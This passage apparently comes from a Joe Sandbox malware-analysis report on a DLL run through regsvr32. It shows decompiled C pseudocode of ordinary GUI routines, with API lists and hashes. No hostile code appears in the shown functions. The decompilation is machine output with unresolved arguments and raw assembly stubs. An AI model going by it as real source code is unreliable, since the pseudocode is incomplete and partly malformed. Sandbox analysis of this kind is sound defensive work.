                                                                                                                • InflateRect.USER32 ref: 100446FE
                                                                                                                  • Part of subcall function 10043B94: OffsetRect.USER32 ref: 10043BCB
                                                                                                                  • Part of subcall function 10043F4D: OffsetRect.USER32 ref: 10043F76
                                                                                                                  • Part of subcall function 10043F4D: OffsetRect.USER32 ref: 10043F80
                                                                                                                  • Part of subcall function 10043F4D: OffsetRect.USER32 ref: 10043F8A
                                                                                                                  • Part of subcall function 10043F4D: OffsetRect.USER32 ref: 10043F94
                                                                                                                  • Part of subcall function 100442FE: GetCapture.USER32 ref: 1004430F
                                                                                                                  • Part of subcall function 100442FE: SetCapture.USER32(?), ref: 1004431F
                                                                                                                  • Part of subcall function 100442FE: GetCapture.USER32 ref: 1004432B
                                                                                                                  • Part of subcall function 100442FE: GetMessageA.USER32 ref: 10044345
                                                                                                                  • Part of subcall function 100442FE: DispatchMessageA.USER32 ref: 10044377
                                                                                                                  • Part of subcall function 100442FE: GetCapture.USER32 ref: 100443D5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Offset$Capture$MessageWindow$AddressHandleInflateModuleProc$DesktopDispatchEmptyLockPeekUpdate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1062258019-0
                                                                                                                • Opcode ID: 67f520f56967a2ed91aaeee5dd87e8751fe0b00d6e60048abf72591966aa5ee6
                                                                                                                • Instruction ID: 033dee92a02667b33d4f71786534c4978ee569dc66ecec565995e3ee7b1f86bc
                                                                                                                • Opcode Fuzzy Hash: 67f520f56967a2ed91aaeee5dd87e8751fe0b00d6e60048abf72591966aa5ee6
                                                                                                                • Instruction Fuzzy Hash: 43B16D75900619EFDF01DFA4C881EEE7BBAEF4A310F114194FD05AB255DA71AD44CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 92%
                                                                                                                			E10043FFD(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				char _v12;
                                                                                                                				struct tagRECT _v28;
                                                                                                                				struct tagRECT _v44;
                                                                                                                				struct tagRECT _v60;
                                                                                                                				void* _t81;
                                                                                                                				int _t83;
                                                                                                                				int _t90;
                                                                                                                				intOrPtr _t92;
                                                                                                                				intOrPtr _t111;
                                                                                                                				int _t125;
                                                                                                                				void* _t134;
                                                                                                                				void* _t139;
                                                                                                                				intOrPtr _t143;
                                                                                                                				void* _t145;
                                                                                                                				void* _t149;
                                                                                                                
                                                                                                                				_t145 = __edi;
                                                                                                                				_t134 = __ecx;
                                                                                                                				_t81 = _a4 -  *((intOrPtr*)(__ecx + 4));
                                                                                                                				_t139 = _a8 -  *((intOrPtr*)(__ecx + 8));
                                                                                                                				_t143 =  *((intOrPtr*)(__ecx + 0x8c));
                                                                                                                				_t149 = 2;
                                                                                                                				if(_t143 == 0xa) {
                                                                                                                					L7:
                                                                                                                					 *((intOrPtr*)(_t134 + 0x28)) =  *((intOrPtr*)(_t134 + 0x28)) + _t81;
                                                                                                                					L9:
                                                                                                                					_t83 =  *((intOrPtr*)(_t134 + 0x30)) -  *((intOrPtr*)(_t134 + 0x28));
                                                                                                                					__eflags = _t83;
                                                                                                                					L10:
                                                                                                                					if(_t83 < 0) {
                                                                                                                						_t83 = 0;
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x68)))) + 0x138))( &_v12, _t83, _t149, _t145);
                                                                                                                					_v44.left = GetSystemMetrics(0x4c);
                                                                                                                					_v44.top = GetSystemMetrics(0x4d);
                                                                                                                					_v44.right = GetSystemMetrics(0x4e) + _v44.left;
                                                                                                                					_t90 = GetSystemMetrics(0x4f);
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					_v44.bottom = _t90 + _v44.top;
                                                                                                                					_t92 =  *((intOrPtr*)(_t134 + 0x8c));
                                                                                                                					asm("movsd");
                                                                                                                					if(_t92 == 0xa || _t92 == 0xc) {
                                                                                                                						_v28.left =  *((intOrPtr*)(_t134 + 0x58)) -  *((intOrPtr*)(_t134 + 0x60)) - _v12 + _v28.right;
                                                                                                                						_v28.top =  *((intOrPtr*)(_t134 + 0x5c)) -  *((intOrPtr*)(_t134 + 0x64)) - _v8 + _v28.bottom;
                                                                                                                						__eflags = IntersectRect( &_v60,  &_v44,  &_v28);
                                                                                                                						if(__eflags != 0) {
                                                                                                                							 *((intOrPtr*)(_t134 + 0x38)) =  *((intOrPtr*)(_t134 + 0x40)) - _v12;
                                                                                                                							_t111 =  *((intOrPtr*)(_t134 + 0x44)) - _v8;
                                                                                                                							__eflags = _t111;
                                                                                                                							 *((intOrPtr*)(_t134 + 0x3c)) = _t111;
                                                                                                                							 *(_t134 + 0x48) = _v28.left;
                                                                                                                							 *((intOrPtr*)(_t134 + 0x4c)) = _v28.top;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_v28.right =  *((intOrPtr*)(_t134 + 0x60)) -  *((intOrPtr*)(_t134 + 0x58)) + _v28.left + _v12;
                                                                                                                						_v28.bottom =  *((intOrPtr*)(_t134 + 0x64)) -  *((intOrPtr*)(_t134 + 0x5c)) + _v28.top + _v8;
                                                                                                                						_t125 = IntersectRect( &_v60,  &_v44,  &_v28);
                                                                                                                						_t162 = _t125;
                                                                                                                						if(_t125 != 0) {
                                                                                                                							 *((intOrPtr*)(_t134 + 0x40)) =  *((intOrPtr*)(_t134 + 0x38)) + _v12;
                                                                                                                							 *((intOrPtr*)(_t134 + 0x44)) =  *((intOrPtr*)(_t134 + 0x3c)) + _v8;
                                                                                                                							 *((intOrPtr*)(_t134 + 0x50)) = _v28.right;
                                                                                                                							 *((intOrPtr*)(_t134 + 0x54)) = _v28.bottom;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)(_t134 + 4)) = _a4;
                                                                                                                					 *((intOrPtr*)(_t134 + 8)) = _a8;
                                                                                                                					return E10043DEE(_t134, _t162, 0);
                                                                                                                				}
                                                                                                                				if(_t143 == 0xb) {
                                                                                                                					__eflags = _t143 - 0xa;
                                                                                                                					if(_t143 != 0xa) {
                                                                                                                						_t14 = __ecx + 0x30;
                                                                                                                						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t81;
                                                                                                                						__eflags =  *_t14;
                                                                                                                						goto L9;
                                                                                                                					}
                                                                                                                					goto L7;
                                                                                                                				} else {
                                                                                                                					_t149 = 0x22;
                                                                                                                					if(_t143 != 0xc) {
                                                                                                                						_t8 = __ecx + 0x34;
                                                                                                                						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t139;
                                                                                                                						__eflags =  *_t8;
                                                                                                                					} else {
                                                                                                                						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t139;
                                                                                                                					}
                                                                                                                					_t83 =  *((intOrPtr*)(_t134 + 0x34)) -  *((intOrPtr*)(_t134 + 0x2c));
                                                                                                                					goto L10;
                                                                                                                				}
                                                                                                                			}




















                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem$IntersectRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 1124862357-0
                                                                                                                • Opcode ID: 3b0aa6f9faa56136fe567557d11243fb8cf2b5c990d1912d651e0cfb982aeed5
                                                                                                                • Instruction ID: 917d11f897bfa57f403c9ec645025f4c5d4c3deac5c3f87a3aea9b27b5094f21
                                                                                                                • Opcode Fuzzy Hash: 3b0aa6f9faa56136fe567557d11243fb8cf2b5c990d1912d651e0cfb982aeed5
                                                                                                                • Instruction Fuzzy Hash: 91516672A00209DFCF54DFA8C5C5A9E7BF5FF08350F1545A5EA09EB24AE634E980CB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 63%
                                                                                                                			E1003E699(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				char _v17;
                                                                                                                				char _v18;
                                                                                                                				signed int _v19;
                                                                                                                				char _v28;
                                                                                                                				long _v32;
                                                                                                                				signed int _v36;
                                                                                                                				char _v52;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t43;
                                                                                                                				signed int _t50;
                                                                                                                				signed char _t57;
                                                                                                                				void* _t68;
                                                                                                                				void* _t86;
                                                                                                                				intOrPtr* _t87;
                                                                                                                				intOrPtr* _t88;
                                                                                                                				signed int _t89;
                                                                                                                
                                                                                                                				_t86 = __edx;
                                                                                                                				_t43 =  *0x100b9e70; // 0xbb35530
                                                                                                                				_v8 = _t43 ^ _t89;
                                                                                                                				_t87 = _a8;
                                                                                                                				_t88 = __ecx;
                                                                                                                				_push( &_v28);
                                                                                                                				_push(_a4);
                                                                                                                				_push(0x417);
                                                                                                                				 *((intOrPtr*)( *__ecx + 0x110))();
                                                                                                                				 *(_t87 + 8) =  *(_t87 + 8) ^ 0x00000004;
                                                                                                                				_v18 = 0;
                                                                                                                				_v17 = 0;
                                                                                                                				 *((char*)(_t87 + 0xa)) = 0;
                                                                                                                				 *((char*)(_t87 + 0xb)) = 0;
                                                                                                                				if(E1004A7B7(_t87,  &_v28, 0x14) != 0) {
                                                                                                                					_t50 = E100177F8(_t88);
                                                                                                                					_t69 = _t50;
                                                                                                                					_v36 = _t50;
                                                                                                                					E1001782C(_t88, 0x10000000, 0, 0);
                                                                                                                					 *((intOrPtr*)( *_t88 + 0x110))(0x416, _a4, 0, _t68);
                                                                                                                					if( *((intOrPtr*)(_t87 + 0x10)) < 0xffffffff) {
                                                                                                                						_v32 = SendMessageA( *(_t88 + 0x20), 0x43d, 0, 0);
                                                                                                                						SendMessageA( *(_t88 + 0x20), 0xb, 0, 0);
                                                                                                                						SendMessageA( *(_t88 + 0x20), 0x43c, _v32 + 1, 0);
                                                                                                                						SendMessageA( *(_t88 + 0x20), 0x43c, _v32, 0);
                                                                                                                						SendMessageA( *(_t88 + 0x20), 0xb, 1, 0);
                                                                                                                						 *((intOrPtr*)(_t87 + 0x10)) =  *((intOrPtr*)(_t87 + 0x10)) + 0xf4240;
                                                                                                                						_t69 = _v36;
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)( *_t88 + 0x110))(_a4, _t87);
                                                                                                                					E1001782C(_t88, 0, _t69 & 0x10000000, 0);
                                                                                                                					_t57 =  *((intOrPtr*)(_t87 + 9));
                                                                                                                					_t68 = 0x415;
                                                                                                                					if(((_t57 ^ _v19) & 0x00000001) != 0 || (_t57 & 0x00000001) != 0 &&  *_t87 != _v28) {
                                                                                                                						_push(1);
                                                                                                                						_push(0);
                                                                                                                						goto L9;
                                                                                                                					} else {
                                                                                                                						_push( &_v52);
                                                                                                                						_push(_a4);
                                                                                                                						_push(0x41d);
                                                                                                                						if( *((intOrPtr*)( *_t88 + 0x110))() != 0) {
                                                                                                                							_push(1);
                                                                                                                							_push( &_v52);
                                                                                                                							L9:
                                                                                                                							_t48 = InvalidateRect( *(_t88 + 0x20), ??, ??);
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return E1004763E(_t48, _t68, _v8 ^ _t89, _t86, _t87, _t88);
                                                                                                                			}























                                                                                                                APIs
                                                                                                                  • Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803
                                                                                                                • SendMessageA.USER32 ref: 1003E73A
                                                                                                                • SendMessageA.USER32 ref: 1003E748
                                                                                                                • SendMessageA.USER32 ref: 1003E759
                                                                                                                • SendMessageA.USER32 ref: 1003E768
                                                                                                                • SendMessageA.USER32 ref: 1003E773
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 1003E7E6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$InvalidateLongRectWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 74886174-0
                                                                                                                • Opcode ID: 827346ad1f91414aa146f463bbb10db327099f6c7691194f7244797a1acd95c3
                                                                                                                • Instruction ID: d30088e821e30678c8b610df5a77cc83cd6e6cd6692d123265b1387941753b0c
                                                                                                                • Opcode Fuzzy Hash: 827346ad1f91414aa146f463bbb10db327099f6c7691194f7244797a1acd95c3
                                                                                                                • Instruction Fuzzy Hash: A6415C34640248BFEB11DB64CC96FEEBBB5FF08B50F104568FA556A2D1C7B1A940CB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 42%
                                                                                                                			E1003A866(void* __edx, void* __eflags) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t42;
                                                                                                                				void* _t46;
                                                                                                                				void* _t47;
                                                                                                                				void* _t52;
                                                                                                                				intOrPtr _t66;
                                                                                                                				intOrPtr _t74;
                                                                                                                				void* _t76;
                                                                                                                				void* _t96;
                                                                                                                				void* _t97;
                                                                                                                				intOrPtr* _t98;
                                                                                                                				void* _t99;
                                                                                                                				short* _t101;
                                                                                                                				void* _t102;
                                                                                                                				signed int _t103;
                                                                                                                				void* _t105;
                                                                                                                
                                                                                                                				_t96 = __edx;
                                                                                                                				_t103 = _t105 - 0x8c;
                                                                                                                				_t42 =  *0x100b9e70; // 0xbb35530
                                                                                                                				 *(_t103 + 0x88) = _t42 ^ _t103;
                                                                                                                				_t74 =  *((intOrPtr*)(_t103 + 0x98));
                                                                                                                				_t101 =  *((intOrPtr*)(_t103 + 0x94));
                                                                                                                				_push(_t97);
                                                                                                                				E10049170(_t97, _t101, 0, 0x20);
                                                                                                                				 *((intOrPtr*)(_t103 - 0x80)) = _t103 - 0x78;
                                                                                                                				_t46 = E100203AA(_t74, 0x1009ee08);
                                                                                                                				_t98 = __imp__#2;
                                                                                                                				if(_t46 == 0) {
                                                                                                                					_t78 = _t74;
                                                                                                                					_t47 = E100203AA(_t74, 0x10099fa4);
                                                                                                                					__eflags = _t47;
                                                                                                                					_push(0x100);
                                                                                                                					_push(_t103 - 0x78);
                                                                                                                					if(_t47 == 0) {
                                                                                                                						_push(0xf108);
                                                                                                                						E1001FA58(_t74, _t78, _t98, _t101, _t103);
                                                                                                                						 *_t101 = 0xf108;
                                                                                                                					} else {
                                                                                                                						_push(0xf10a);
                                                                                                                						E1001FA58(_t74, _t78, _t98, _t101, _t103);
                                                                                                                						 *_t101 = 0xf10a;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					 *((intOrPtr*)(_t103 - 0x80)) =  *((intOrPtr*)(_t74 + 0xc));
                                                                                                                					 *_t101 =  *((intOrPtr*)(_t74 + 8));
                                                                                                                					 *((intOrPtr*)(_t101 + 0x10)) =  *((intOrPtr*)(_t74 + 0x10));
                                                                                                                					 *((intOrPtr*)(_t101 + 0x1c)) =  *((intOrPtr*)(_t74 + 0x1c));
                                                                                                                					_t66 =  *((intOrPtr*)(_t74 + 0x14));
                                                                                                                					_t111 =  *((intOrPtr*)(_t66 - 0xc));
                                                                                                                					if( *((intOrPtr*)(_t66 - 0xc)) != 0) {
                                                                                                                						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E1000B9D2(_t74, _t103 - 0x7c, _t98, _t101, _t111))), _t66);
                                                                                                                						L100013E3( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
                                                                                                                					}
                                                                                                                					_t74 =  *((intOrPtr*)(_t74 + 0x18));
                                                                                                                					_t113 =  *((intOrPtr*)(_t74 - 0xc));
                                                                                                                					if( *((intOrPtr*)(_t74 - 0xc)) != 0) {
                                                                                                                						 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E1000B9D2(_t74, _t103 - 0x7c, _t98, _t101, _t113))), _t74);
                                                                                                                						L100013E3( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t101 + 8)) =  *_t98( *((intOrPtr*)(E1000B9D2(_t74, _t103 - 0x7c, _t98, _t101, _t113))),  *((intOrPtr*)(_t103 - 0x80)));
                                                                                                                				_t52 = L100013E3( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
                                                                                                                				_t114 =  *((intOrPtr*)(_t101 + 4));
                                                                                                                				if( *((intOrPtr*)(_t101 + 4)) == 0) {
                                                                                                                					 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E1000B9D2(0, _t103 - 0x7c, _t98, _t101, _t114))),  *((intOrPtr*)(E1001E302(0, _t98, _t101, _t114) + 0x10)));
                                                                                                                					_t52 = L100013E3( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)(_t101 + 0xc)) == 0) {
                                                                                                                					_t117 =  *((intOrPtr*)(_t101 + 0x10));
                                                                                                                					if( *((intOrPtr*)(_t101 + 0x10)) != 0) {
                                                                                                                						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E1000B9D2(0, _t103 - 0x7c, _t98, _t101, _t117))),  *((intOrPtr*)( *((intOrPtr*)(E1001E302(0, _t98, _t101, _t117) + 4)) + 0x64)));
                                                                                                                						_t52 = L100013E3( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_pop(_t99);
                                                                                                                				_pop(_t102);
                                                                                                                				_pop(_t76);
                                                                                                                				return E1004763E(_t52, _t76,  *(_t103 + 0x88) ^ _t103, _t96, _t99, _t102);
                                                                                                                			}























                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 1003A895
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1003A8E6
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1003A90A
                                                                                                                  • Part of subcall function 1000B9D2: __EH_prolog3.LIBCMT ref: 1000B9D9
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1003A962
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1003A98B
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1003A9BA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocString$H_prolog3_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 842698744-0
                                                                                                                • Opcode ID: 6d8f488ef925847840e43afd7d83c594b72d848409058837a7515ba358218f19
                                                                                                                • Instruction ID: dfef55ded7a008922d057449d15f10d95a2a40bb4d43d9ca1603c11ce763908f
                                                                                                                • Opcode Fuzzy Hash: 6d8f488ef925847840e43afd7d83c594b72d848409058837a7515ba358218f19
                                                                                                                • Instruction Fuzzy Hash: DD416834900605CFDB21DFB8C881A9DB7B4FF05310F10852EE5AAAB2A2DB74A954CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 81%
                                                                                                                			E1001B3BD(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t37;
                                                                                                                				signed int _t54;
                                                                                                                				intOrPtr _t57;
                                                                                                                				long _t60;
                                                                                                                				struct HWND__* _t63;
                                                                                                                				CHAR* _t64;
                                                                                                                				void* _t65;
                                                                                                                				void* _t67;
                                                                                                                				void* _t71;
                                                                                                                				void* _t72;
                                                                                                                				long _t73;
                                                                                                                				void* _t74;
                                                                                                                				void* _t75;
                                                                                                                				signed int _t77;
                                                                                                                				void* _t78;
                                                                                                                				signed int _t79;
                                                                                                                				void* _t81;
                                                                                                                
                                                                                                                				_t71 = __edx;
                                                                                                                				_t79 = _t81 - 0x9c;
                                                                                                                				_t37 =  *0x100b9e70; // 0xbb35530
                                                                                                                				 *(_t79 + 0x98) = _t37 ^ _t79;
                                                                                                                				_t73 =  *(_t79 + 0xa4);
                                                                                                                				_t77 = 0;
                                                                                                                				 *((intOrPtr*)(_t79 - 0x80)) =  *((intOrPtr*)(_t79 + 0xa8));
                                                                                                                				E1001B2DE(0);
                                                                                                                				_t67 = _t72;
                                                                                                                				_t63 = E1001B312(0, _t79 - 0x70);
                                                                                                                				 *(_t79 - 0x7c) = _t63;
                                                                                                                				if(_t63 !=  *(_t79 - 0x70)) {
                                                                                                                					EnableWindow(_t63, 1);
                                                                                                                				}
                                                                                                                				 *(_t79 - 0x78) =  *(_t79 - 0x78) & _t77;
                                                                                                                				GetWindowThreadProcessId(_t63, _t79 - 0x78);
                                                                                                                				if(_t63 == 0 ||  *(_t79 - 0x78) != GetCurrentProcessId()) {
                                                                                                                					L6:
                                                                                                                					__eflags = _t73;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						_t77 = _t73 + 0x78;
                                                                                                                					}
                                                                                                                					goto L8;
                                                                                                                				} else {
                                                                                                                					_t60 = SendMessageA(_t63, 0x376, 0, 0);
                                                                                                                					if(_t60 == 0) {
                                                                                                                						goto L6;
                                                                                                                					} else {
                                                                                                                						_t77 = _t60;
                                                                                                                						L8:
                                                                                                                						 *(_t79 - 0x74) =  *(_t79 - 0x74) & 0x00000000;
                                                                                                                						if(_t77 != 0) {
                                                                                                                							 *(_t79 - 0x74) =  *_t77;
                                                                                                                							_t57 =  *((intOrPtr*)(_t79 + 0xb0));
                                                                                                                							if(_t57 != 0) {
                                                                                                                								 *_t77 = _t57 + 0x30000;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						if(( *(_t79 + 0xac) & 0x000000f0) == 0) {
                                                                                                                							_t54 =  *(_t79 + 0xac) & 0x0000000f;
                                                                                                                							if(_t54 <= 1) {
                                                                                                                								_t24 = _t79 + 0xac;
                                                                                                                								 *_t24 =  *(_t79 + 0xac) | 0x00000030;
                                                                                                                								__eflags =  *_t24;
                                                                                                                							} else {
                                                                                                                								if(_t54 + 0xfffffffd <= 1) {
                                                                                                                									 *(_t79 + 0xac) =  *(_t79 + 0xac) | 0x00000020;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t96 = _t73;
                                                                                                                						 *(_t79 - 0x6c) = 0;
                                                                                                                						if(_t73 == 0) {
                                                                                                                							_t64 = _t79 - 0x6c;
                                                                                                                							_t73 = 0x104;
                                                                                                                							__eflags = GetModuleFileNameA(0, _t64, 0x104) - 0x104;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								 *((char*)(_t79 + 0x97)) = 0;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_t64 =  *(_t73 + 0x50);
                                                                                                                						}
                                                                                                                						_push( *(_t79 + 0xac));
                                                                                                                						_push(_t64);
                                                                                                                						_push( *((intOrPtr*)(_t79 - 0x80)));
                                                                                                                						_push( *(_t79 - 0x7c));
                                                                                                                						_t74 = E10012602(_t64, _t67, _t73, _t77, _t96);
                                                                                                                						if(_t77 != 0) {
                                                                                                                							 *_t77 =  *(_t79 - 0x74);
                                                                                                                						}
                                                                                                                						if( *(_t79 - 0x70) != 0) {
                                                                                                                							EnableWindow( *(_t79 - 0x70), 1);
                                                                                                                						}
                                                                                                                						E1001B2DE(1);
                                                                                                                						_pop(_t75);
                                                                                                                						_pop(_t78);
                                                                                                                						_pop(_t65);
                                                                                                                						return E1004763E(_t74, _t65,  *(_t79 + 0x98) ^ _t79, _t71, _t75, _t78);
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}
                                                                                                                0x1001b4dc
                                                                                                                0x1001b4de
                                                                                                                0x1001b4e3
                                                                                                                0x1001b4e3
                                                                                                                0x1001b4e9
                                                                                                                0x1001b4f0
                                                                                                                0x1001b4f0
                                                                                                                0x1001b4f8
                                                                                                                0x1001b506
                                                                                                                0x1001b507
                                                                                                                0x1001b50a
                                                                                                                0x1001b517
                                                                                                                0x1001b517
                                                                                                                0x1001b43f

                                                                                                                APIs
                                                                                                                  • Part of subcall function 1001B312: GetParent.USER32(?), ref: 1001B365
                                                                                                                  • Part of subcall function 1001B312: GetLastActivePopup.USER32(?), ref: 1001B374
                                                                                                                  • Part of subcall function 1001B312: IsWindowEnabled.USER32(?), ref: 1001B389
                                                                                                                  • Part of subcall function 1001B312: EnableWindow.USER32(?,00000000), ref: 1001B39C
                                                                                                                • EnableWindow.USER32(?,00000001), ref: 1001B40A
                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 1001B418
                                                                                                                • GetCurrentProcessId.KERNEL32(?,?), ref: 1001B422
                                                                                                                • SendMessageA.USER32 ref: 1001B437
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 1001B4B4
                                                                                                                • EnableWindow.USER32(?,00000001), ref: 1001B4F0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
